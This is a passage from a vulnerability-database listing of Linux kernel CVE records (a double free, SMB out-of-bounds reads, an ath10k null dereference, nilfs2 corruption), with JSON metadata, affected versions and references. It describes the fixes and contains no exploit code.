                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nirqchip/gic-v3-its: Prevent double free on error\n\nThe error handling path in its_vpe_irq_domain_alloc() causes a double free\nwhen its_vpe_init() fails after successfully allocating at least one\ninterrupt. This happens because its_vpe_irq_domain_free() frees the\ninterrupts along with the area bitmap and the vprop_page and\nits_vpe_irq_domain_alloc() subsequently frees the area bitmap and the\nvprop_page again.\n\nFix this by unconditionally invoking its_vpe_irq_domain_free() which\nhandles all cases correctly and by removing the bitmap/vprop_page freeing\nfrom its_vpe_irq_domain_alloc().\n\n[ tglx: Massaged change log ]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:44.998Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f5417ff561b8ac9a7e53c747b8627a7ab58378ae"
        },
        {
          "url": "https://git.kernel.org/stable/c/b72d2b1448b682844f995e660b77f2a1fabc1662"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa44d21574751a7d6bca892eb8e0e9ac68372e52"
        },
        {
          "url": "https://git.kernel.org/stable/c/5dbdbe1133911ca7d8466bb86885adec32ad9438"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd681710ab77c8beafe2e263064cb1bd0e2d6ca9"
        },
        {
          "url": "https://git.kernel.org/stable/c/03170e657f62c26834172742492a8cb8077ef792"
        },
        {
          "url": "https://git.kernel.org/stable/c/5b012f77abde89bf0be8a0547636184fea618137"
        },
        {
          "url": "https://git.kernel.org/stable/c/c26591afd33adce296c022e3480dea4282b7ef91"
        }
      ],
      "title": "irqchip/gic-v3-its: Prevent double free on error",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35847",
    "datePublished": "2024-05-17T14:47:26.175Z",
    "dateReserved": "2024-05-17T13:50:33.105Z",
    "dateUpdated": "2025-05-04T09:06:44.998Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2023-52434 (GCVE-0-2023-52434)

Vulnerability from cvelistv5 – Published: 2024-02-20 18:04 – Updated: 2026-01-05 10:16

Title

smb: client: fix potential OOBs in smb2_parse_contexts()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential OOBs in smb2_parse_contexts() Validate offsets and lengths before dereferencing create contexts in smb2_parse_contexts(). This fixes following oops when accessing invalid create contexts from server: BUG: unable to handle page fault for address: ffff8881178d8cc3 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 4a01067 P4D 4a01067 PUD 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 3 PID: 1736 Comm: mount.cifs Not tainted 6.7.0-rc4 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014 RIP: 0010:smb2_parse_contexts+0xa0/0x3a0 [cifs] Code: f8 10 75 13 48 b8 93 ad 25 50 9c b4 11 e7 49 39 06 0f 84 d2 00 00 00 8b 45 00 85 c0 74 61 41 29 c5 48 01 c5 41 83 fd 0f 76 55 <0f> b7 7d 04 0f b7 45 06 4c 8d 74 3d 00 66 83 f8 04 75 bc ba 04 00 RSP: 0018:ffffc900007939e0 EFLAGS: 00010216 RAX: ffffc90000793c78 RBX: ffff8880180cc000 RCX: ffffc90000793c90 RDX: ffffc90000793cc0 RSI: ffff8880178d8cc0 RDI: ffff8880180cc000 RBP: ffff8881178d8cbf R08: ffffc90000793c22 R09: 0000000000000000 R10: ffff8880180cc000 R11: 0000000000000024 R12: 0000000000000000 R13: 0000000000000020 R14: 0000000000000000 R15: ffffc90000793c22 FS: 00007f873753cbc0(0000) GS:ffff88806bc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff8881178d8cc3 CR3: 00000000181ca000 CR4: 0000000000750ef0 PKRU: 55555554 Call Trace: <TASK> ? __die+0x23/0x70 ? page_fault_oops+0x181/0x480 ? search_module_extables+0x19/0x60 ? srso_alias_return_thunk+0x5/0xfbef5 ? exc_page_fault+0x1b6/0x1c0 ? asm_exc_page_fault+0x26/0x30 ? smb2_parse_contexts+0xa0/0x3a0 [cifs] SMB2_open+0x38d/0x5f0 [cifs] ? smb2_is_path_accessible+0x138/0x260 [cifs] smb2_is_path_accessible+0x138/0x260 [cifs] cifs_is_path_remote+0x8d/0x230 [cifs] cifs_mount+0x7e/0x350 [cifs] cifs_smb3_do_mount+0x128/0x780 [cifs] smb3_get_tree+0xd9/0x290 [cifs] vfs_get_tree+0x2c/0x100 ? capable+0x37/0x70 path_mount+0x2d7/0xb80 ? srso_alias_return_thunk+0x5/0xfbef5 ? _raw_spin_unlock_irqrestore+0x44/0x60 __x64_sys_mount+0x11a/0x150 do_syscall_64+0x47/0xf0 entry_SYSCALL_64_after_hwframe+0x6f/0x77 RIP: 0033:0x7f8737657b1e

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6726429c18c62dbf5…
	https://git.kernel.org/stable/c/13fb0fc4917621f3d…
	https://git.kernel.org/stable/c/890bc4fac3c0973a4…
	https://git.kernel.org/stable/c/1ae3c59355dc9882e…
	https://git.kernel.org/stable/c/17a0f64cc02d4972e…
	https://git.kernel.org/stable/c/af1689a9b7701d990…

Impacted products

Vendor

Product

Version

Linux

Affected: b8c32dbb0deb287a5fcb78251e4eae6c7275760d , < 6726429c18c62dbf5e96ebbd522f262e016553fb (git)
Affected: b8c32dbb0deb287a5fcb78251e4eae6c7275760d , < 13fb0fc4917621f3dfa285a27eaf7151d770b5e5 (git)
Affected: b8c32dbb0deb287a5fcb78251e4eae6c7275760d , < 890bc4fac3c0973a49cac35f634579bebba7fe48 (git)
Affected: b8c32dbb0deb287a5fcb78251e4eae6c7275760d , < 1ae3c59355dc9882e09c020afe8ffbd895ad0f29 (git)
Affected: b8c32dbb0deb287a5fcb78251e4eae6c7275760d , < 17a0f64cc02d4972e21c733d9f21d1c512963afa (git)
Affected: b8c32dbb0deb287a5fcb78251e4eae6c7275760d , < af1689a9b7701d9907dfc84d2a4b57c4bc907144 (git)

Linux

Affected: 3.7
Unaffected: 0 , < 3.7 (semver)
Unaffected: 5.4.277 , ≤ 5.4.* (semver)
Unaffected: 5.10.211 , ≤ 5.10.* (semver)
Unaffected: 5.15.150 , ≤ 5.15.* (semver)
Unaffected: 6.1.79 , ≤ 6.1.* (semver)
Unaffected: 6.6.8 , ≤ 6.6.* (semver)
Unaffected: 6.7 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52434",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-20T19:31:41.798943Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:08.159Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-01-17T20:02:50.854Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6726429c18c62dbf5e96ebbd522f262e016553fb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13fb0fc4917621f3dfa285a27eaf7151d770b5e5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/890bc4fac3c0973a49cac35f634579bebba7fe48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1ae3c59355dc9882e09c020afe8ffbd895ad0f29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17a0f64cc02d4972e21c733d9f21d1c512963afa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/af1689a9b7701d9907dfc84d2a4b57c4bc907144"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "url": "https://security.netapp.com/advisory/ntap-20250117-0009/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cached_dir.c",
            "fs/smb/client/smb2pdu.c",
            "fs/smb/client/smb2proto.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6726429c18c62dbf5e96ebbd522f262e016553fb",
              "status": "affected",
              "version": "b8c32dbb0deb287a5fcb78251e4eae6c7275760d",
              "versionType": "git"
            },
            {
              "lessThan": "13fb0fc4917621f3dfa285a27eaf7151d770b5e5",
              "status": "affected",
              "version": "b8c32dbb0deb287a5fcb78251e4eae6c7275760d",
              "versionType": "git"
            },
            {
              "lessThan": "890bc4fac3c0973a49cac35f634579bebba7fe48",
              "status": "affected",
              "version": "b8c32dbb0deb287a5fcb78251e4eae6c7275760d",
              "versionType": "git"
            },
            {
              "lessThan": "1ae3c59355dc9882e09c020afe8ffbd895ad0f29",
              "status": "affected",
              "version": "b8c32dbb0deb287a5fcb78251e4eae6c7275760d",
              "versionType": "git"
            },
            {
              "lessThan": "17a0f64cc02d4972e21c733d9f21d1c512963afa",
              "status": "affected",
              "version": "b8c32dbb0deb287a5fcb78251e4eae6c7275760d",
              "versionType": "git"
            },
            {
              "lessThan": "af1689a9b7701d9907dfc84d2a4b57c4bc907144",
              "status": "affected",
              "version": "b8c32dbb0deb287a5fcb78251e4eae6c7275760d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/cached_dir.c",
            "fs/smb/client/smb2pdu.c",
            "fs/smb/client/smb2proto.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.7"
            },
            {
              "lessThan": "3.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.277",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.211",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.150",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.79",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.7",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.277",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.211",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.150",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.79",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.8",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7",
                  "versionStartIncluding": "3.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential OOBs in smb2_parse_contexts()\n\nValidate offsets and lengths before dereferencing create contexts in\nsmb2_parse_contexts().\n\nThis fixes following oops when accessing invalid create contexts from\nserver:\n\n  BUG: unable to handle page fault for address: ffff8881178d8cc3\n  #PF: supervisor read access in kernel mode\n  #PF: error_code(0x0000) - not-present page\n  PGD 4a01067 P4D 4a01067 PUD 0\n  Oops: 0000 [#1] PREEMPT SMP NOPTI\n  CPU: 3 PID: 1736 Comm: mount.cifs Not tainted 6.7.0-rc4 #1\n  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n  rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014\n  RIP: 0010:smb2_parse_contexts+0xa0/0x3a0 [cifs]\n  Code: f8 10 75 13 48 b8 93 ad 25 50 9c b4 11 e7 49 39 06 0f 84 d2 00\n  00 00 8b 45 00 85 c0 74 61 41 29 c5 48 01 c5 41 83 fd 0f 76 55 \u003c0f\u003e b7\n  7d 04 0f b7 45 06 4c 8d 74 3d 00 66 83 f8 04 75 bc ba 04 00\n  RSP: 0018:ffffc900007939e0 EFLAGS: 00010216\n  RAX: ffffc90000793c78 RBX: ffff8880180cc000 RCX: ffffc90000793c90\n  RDX: ffffc90000793cc0 RSI: ffff8880178d8cc0 RDI: ffff8880180cc000\n  RBP: ffff8881178d8cbf R08: ffffc90000793c22 R09: 0000000000000000\n  R10: ffff8880180cc000 R11: 0000000000000024 R12: 0000000000000000\n  R13: 0000000000000020 R14: 0000000000000000 R15: ffffc90000793c22\n  FS: 00007f873753cbc0(0000) GS:ffff88806bc00000(0000)\n  knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: ffff8881178d8cc3 CR3: 00000000181ca000 CR4: 0000000000750ef0\n  PKRU: 55555554\n  Call Trace:\n   \u003cTASK\u003e\n   ? __die+0x23/0x70\n   ? page_fault_oops+0x181/0x480\n   ? search_module_extables+0x19/0x60\n   ? srso_alias_return_thunk+0x5/0xfbef5\n   ? exc_page_fault+0x1b6/0x1c0\n   ? asm_exc_page_fault+0x26/0x30\n   ? smb2_parse_contexts+0xa0/0x3a0 [cifs]\n   SMB2_open+0x38d/0x5f0 [cifs]\n   ? smb2_is_path_accessible+0x138/0x260 [cifs]\n   smb2_is_path_accessible+0x138/0x260 [cifs]\n   cifs_is_path_remote+0x8d/0x230 [cifs]\n   cifs_mount+0x7e/0x350 [cifs]\n   cifs_smb3_do_mount+0x128/0x780 [cifs]\n   smb3_get_tree+0xd9/0x290 [cifs]\n   vfs_get_tree+0x2c/0x100\n   ? capable+0x37/0x70\n   path_mount+0x2d7/0xb80\n   ? srso_alias_return_thunk+0x5/0xfbef5\n   ? _raw_spin_unlock_irqrestore+0x44/0x60\n   __x64_sys_mount+0x11a/0x150\n   do_syscall_64+0x47/0xf0\n   entry_SYSCALL_64_after_hwframe+0x6f/0x77\n  RIP: 0033:0x7f8737657b1e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:16:04.679Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6726429c18c62dbf5e96ebbd522f262e016553fb"
        },
        {
          "url": "https://git.kernel.org/stable/c/13fb0fc4917621f3dfa285a27eaf7151d770b5e5"
        },
        {
          "url": "https://git.kernel.org/stable/c/890bc4fac3c0973a49cac35f634579bebba7fe48"
        },
        {
          "url": "https://git.kernel.org/stable/c/1ae3c59355dc9882e09c020afe8ffbd895ad0f29"
        },
        {
          "url": "https://git.kernel.org/stable/c/17a0f64cc02d4972e21c733d9f21d1c512963afa"
        },
        {
          "url": "https://git.kernel.org/stable/c/af1689a9b7701d9907dfc84d2a4b57c4bc907144"
        }
      ],
      "title": "smb: client: fix potential OOBs in smb2_parse_contexts()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52434",
    "datePublished": "2024-02-20T18:04:44.006Z",
    "dateReserved": "2024-02-20T12:30:33.290Z",
    "dateUpdated": "2026-01-05T10:16:04.679Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2023-7042 (GCVE-0-2023-7042)

Vulnerability from cvelistv5 – Published: 2023-12-21 20:02 – Updated: 2025-11-21 06:23

Title

Kernel: null pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev()

Summary

A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.

Severity ?

4.4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

redhat

References

URL

Tags

	https://access.redhat.com/security/cve/CVE-2023-7042	vdb-entryx_refsource_REDHAT
	https://bugzilla.redhat.com/show_bug.cgi?id=2255497	issue-trackingx_refsource_REDHAT
	https://patchwork.kernel.org/project/linux-wirele…

Impacted products

Vendor

Product

Version

Red Hat

Red Hat Enterprise Linux 6

cpe:/o:redhat:enterprise_linux:6

Red Hat	Red Hat Enterprise Linux 7	cpe:/o:redhat:enterprise_linux:7
Red Hat	Red Hat Enterprise Linux 7	cpe:/o:redhat:enterprise_linux:7
Red Hat	Red Hat Enterprise Linux 8	cpe:/o:redhat:enterprise_linux:8
Red Hat	Red Hat Enterprise Linux 8	cpe:/o:redhat:enterprise_linux:8
Red Hat	Red Hat Enterprise Linux 9	cpe:/o:redhat:enterprise_linux:9
Red Hat	Red Hat Enterprise Linux 9	cpe:/o:redhat:enterprise_linux:9

Credits

Red Hat would like to thank Xingyuan Mo of IceSword Lab for reporting this issue.

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T08:50:07.943Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/security/cve/CVE-2023-7042"
          },
          {
            "name": "RHBZ#2255497",
            "tags": [
              "issue-tracking",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255497"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/54PLF5J33IRSLSR4UU6LQSMXX6FI5AOQ/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C25BK2YH5MZ6VNQXKF2NAJBTGXVEPKGC/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://patchwork.kernel.org/project/linux-wireless/patch/20231208043433.271449-1-hdthky0@gmail.com/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-7042",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-27T14:50:17.331103Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-27T15:00:46.793Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
          "cpes": [
            "cpe:/o:redhat:enterprise_linux:6"
          ],
          "defaultStatus": "unknown",
          "packageName": "kernel",
          "product": "Red Hat Enterprise Linux 6",
          "vendor": "Red Hat"
        },
        {
          "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
          "cpes": [
            "cpe:/o:redhat:enterprise_linux:7"
          ],
          "defaultStatus": "unknown",
          "packageName": "kernel",
          "product": "Red Hat Enterprise Linux 7",
          "vendor": "Red Hat"
        },
        {
          "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
          "cpes": [
            "cpe:/o:redhat:enterprise_linux:7"
          ],
          "defaultStatus": "unknown",
          "packageName": "kernel-rt",
          "product": "Red Hat Enterprise Linux 7",
          "vendor": "Red Hat"
        },
        {
          "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
          "cpes": [
            "cpe:/o:redhat:enterprise_linux:8"
          ],
          "defaultStatus": "affected",
          "packageName": "kernel",
          "product": "Red Hat Enterprise Linux 8",
          "vendor": "Red Hat"
        },
        {
          "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
          "cpes": [
            "cpe:/o:redhat:enterprise_linux:8"
          ],
          "defaultStatus": "affected",
          "packageName": "kernel-rt",
          "product": "Red Hat Enterprise Linux 8",
          "vendor": "Red Hat"
        },
        {
          "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
          "cpes": [
            "cpe:/o:redhat:enterprise_linux:9"
          ],
          "defaultStatus": "affected",
          "packageName": "kernel",
          "product": "Red Hat Enterprise Linux 9",
          "vendor": "Red Hat"
        },
        {
          "collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
          "cpes": [
            "cpe:/o:redhat:enterprise_linux:9"
          ],
          "defaultStatus": "affected",
          "packageName": "kernel-rt",
          "product": "Red Hat Enterprise Linux 9",
          "vendor": "Red Hat"
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Red Hat would like to thank Xingyuan Mo of IceSword Lab for reporting this issue."
        }
      ],
      "datePublic": "2023-12-08T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service."
        }
      ],
      "metrics": [
        {
          "other": {
            "content": {
              "namespace": "https://access.redhat.com/security/updates/classification/",
              "value": "Low"
            },
            "type": "Red Hat severity rating"
          }
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-476",
              "description": "NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-11-21T06:23:46.282Z",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/security/cve/CVE-2023-7042"
        },
        {
          "name": "RHBZ#2255497",
          "tags": [
            "issue-tracking",
            "x_refsource_REDHAT"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255497"
        },
        {
          "url": "https://patchwork.kernel.org/project/linux-wireless/patch/20231208043433.271449-1-hdthky0@gmail.com/"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2023-12-21T00:00:00+00:00",
          "value": "Reported to Red Hat."
        },
        {
          "lang": "en",
          "time": "2023-12-08T00:00:00+00:00",
          "value": "Made public."
        }
      ],
      "title": "Kernel: null pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev()",
      "x_redhatCweChain": "CWE-476: NULL Pointer Dereference"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2023-7042",
    "datePublished": "2023-12-21T20:02:16.249Z",
    "dateReserved": "2023-12-21T10:36:53.948Z",
    "dateUpdated": "2025-11-21T06:23:46.282Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26956 (GCVE-0-2024-26956)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:18 – Updated: 2025-05-04 09:00

Title

nilfs2: fix failure to detect DAT corruption in btree and direct mappings

Summary

In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix failure to detect DAT corruption in btree and direct mappings Patch series "nilfs2: fix kernel bug at submit_bh_wbc()". This resolves a kernel BUG reported by syzbot. Since there are two flaws involved, I've made each one a separate patch. The first patch alone resolves the syzbot-reported bug, but I think both fixes should be sent to stable, so I've tagged them as such. This patch (of 2): Syzbot has reported a kernel bug in submit_bh_wbc() when writing file data to a nilfs2 file system whose metadata is corrupted. There are two flaws involved in this issue. The first flaw is that when nilfs_get_block() locates a data block using btree or direct mapping, if the disk address translation routine nilfs_dat_translate() fails with internal code -ENOENT due to DAT metadata corruption, it can be passed back to nilfs_get_block(). This causes nilfs_get_block() to misidentify an existing block as non-existent, causing both data block lookup and insertion to fail inconsistently. The second flaw is that nilfs_get_block() returns a successful status in this inconsistent state. This causes the caller __block_write_begin_int() or others to request a read even though the buffer is not mapped, resulting in a BUG_ON check for the BH_Mapped flag in submit_bh_wbc() failing. This fixes the first issue by changing the return value to code -EINVAL when a conversion using DAT fails with code -ENOENT, avoiding the conflicting condition that leads to the kernel bug described above. Here, code -EINVAL indicates that metadata corruption was detected during the block lookup, which will be properly handled as a file system error and converted to -EIO when passing through the nilfs2 bmap layer.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b67189690eb4b7ecc…
	https://git.kernel.org/stable/c/9cbe1ad5f4354f4df…
	https://git.kernel.org/stable/c/c3b5c5c31e723b568…
	https://git.kernel.org/stable/c/2e2619ff5d0def4bb…
	https://git.kernel.org/stable/c/46b832e09d43b394a…
	https://git.kernel.org/stable/c/f69e81396aea66304…
	https://git.kernel.org/stable/c/a8e4d098de1c0f4c5…
	https://git.kernel.org/stable/c/82827ca21e7c8a913…
	https://git.kernel.org/stable/c/f2f26b4a84a0ef417…

Impacted products

Vendor

Product

Version

Linux

Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < b67189690eb4b7ecc84ae16fa1e880e0123eaa35 (git)
Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < 9cbe1ad5f4354f4df1445e5f4883983328cd6d8e (git)
Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < c3b5c5c31e723b568f83d8cafab8629d9d830ffb (git)
